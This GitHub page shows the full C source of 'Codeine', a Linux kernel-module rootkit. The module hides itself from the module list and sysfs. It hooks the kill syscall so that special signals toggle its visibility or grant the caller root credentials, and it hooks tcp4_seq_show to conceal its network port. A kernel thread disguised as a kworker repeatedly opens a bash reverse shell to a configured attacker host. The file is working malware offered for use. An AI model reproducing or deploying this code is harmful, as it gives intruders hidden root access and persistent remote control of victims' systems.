Codeine/codeine.c at main · diego-tella/Codeine · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
#include <linux/kthread.h>      // Thread management in the kernel.
#include <linux/delay.h>        // Delay functions, such as ssleep().
#include <linux/sched/signal.h> // Process management in the kernel.
#include <linux/string.h>       // For string functions like strlen() and strncmp().
#include <linux/tcp.h>

#include "ftrace_helper.h"
#include "config.h"


MODULE_LICENSE("GPL");
MODULE_AUTHOR("Diego Tellaroli");
MODULE_DESCRIPTION("hauhaua");


static int hide_status = 0;

static void hide_sysfs(void) {
    if (THIS_MODULE->mkobj.kobj.state_initialized) {
        kobject_del(&THIS_MODULE->mkobj.kobj); // Remove the kobject from sysfs
    }
}

static struct list_head *module_previous;
void module_hide(void)
{
        void hide_sysfs(void);
        module_previous = THIS_MODULE->list.prev;
        list_del(&THIS_MODULE->list);

        hide_sysfs();

        hide_status = 1;

}

void module_show(void)
{
 kobject_add(&THIS_MODULE->mkobj.kobj, THIS_MODULE->mkobj.kobj.parent, "codeine"); //add to sysfs

 list_add(&THIS_MODULE->list, module_previous); //add to the module list
 hide_status = 0;
}

void spawnRoot(void){
    struct cred *newcredentials;
    newcredentials = prepare_creds();

    if(newcredentials == NULL){
        return;
    }

    newcredentials->uid.val = 0;
    newcredentials->gid.val = 0;
    newcredentials->suid.val = 0;
    newcredentials->fsuid.val = 0;
    newcredentials->euid.val = 0;

    commit_creds(newcredentials);
}

static asmlinkage long(*orig_kill)(const struct pt_regs *);
static asmlinkage int hook_kill(const struct pt_regs *regs){
    void module_show(void);
    void spawnRoot(void);

    int signal;
    signal = regs->si;

    if(signal == SIGHIDE){
        if(hide_status == 1){
            if(CANBEUNHIDE == TRUE){
                module_show();
            }
        }else{
            module_hide();
        }
    return 0;
    }

    if(signal == ROOT_SIGNAL){
        spawnRoot();
        return 0;
    }
    return orig_kill(regs);
}

/*
 * Usual function declaration for the real tcp4_seq_show
 */
static asmlinkage long (*orig_tcp4_seq_show)(struct seq_file *seq, void *v);
/*
 * Function hook for tcp4_seq_show()
 */
static asmlinkage long hook_tcp4_seq_show(struct seq_file *seq, void *v)
{
    struct sock *sk = v;
    /*
     * Check if sk_dport is 1337
     * (sk_dport = HIDENPORT (1337) )
     * If sk doesn't point to anything, then it points to 0x1
     * It will hide the destination port 1337 so that our reverse shell becomes undetectable
     */
    if (sk != 0x1 && sk->sk_dport == htons(SRV_PORT))
        return 0;
    /*
     * Otherwise, just return with the real tcp4_seq_show()
     */
    return orig_tcp4_seq_show(seq, v);
}
static struct ftrace_hook hooks[] = {
                HOOK("__x64_sys_kill", hook_kill, &orig_kill),
                HOOK("tcp4_seq_show", hook_tcp4_seq_show, &orig_tcp4_seq_show),
};

struct task_struct *mon_thread; // Reference for the monitoring thread.
struct task_struct *task; // Structure used to represent tasks (processes) in the kernel.

int mon_shell(void *data) {     // Function that will be executed by the kernel thread (mon_thread).
    while (!kthread_should_stop()) {  // Checks if the thread should stop.
            char revshell[256];
            snprintf(revshell, sizeof(revshell), "bash -i >& /dev/tcp/%s/%d 0>&1", SRV_IP, SRV_PORT);
            call_usermodehelper("/bin/bash",
                                (char *[]){"/bin/bash", "-c", revshell, NULL},
                                NULL, UMH_WAIT_EXEC);


        ssleep(TIMETOSHELL);  // Waits 30 seconds before trying again.
    }
    return 0;  // Returns 0 when the thread finishes.
}


static int __init uninterruptible_sleep_init(void) {
    module_hide();
    // Creates and runs the monitoring thread mon_shell.
    mon_thread = kthread_run(mon_shell, NULL, "kworker/R-644-sci"); //random name that will appear in ps

    // Checks if the thread creation failed.
    if (IS_ERR(mon_thread)) {
        printk(KERN_ALERT "Failed to create thread!\n");
        return PTR_ERR(mon_thread);  // Returns the error.
    }

    int error;
    error = fh_install_hooks(hooks, ARRAY_SIZE(hooks));
    if(error){
           return error;
    }


    //printk(KERN_INFO "Monitoring started!\n"); //for debugging reasons
    return 0;  // Returns 0 if the thread was successfully created.
}

static void __exit uninterruptible_sleep_exit(void) {
    if (mon_thread) {
        kthread_stop(mon_thread);  // Stops the monitoring thread.
    }

    fh_remove_hooks(hooks, ARRAY_SIZE(hooks));

}

module_init(uninterruptible_sleep_init);
module_exit(uninterruptible_sleep_exit);